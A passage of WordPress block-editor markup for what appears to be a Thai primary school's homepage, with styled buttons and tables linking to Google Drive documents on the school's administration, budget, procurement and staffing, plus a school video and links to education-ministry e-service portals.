{\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 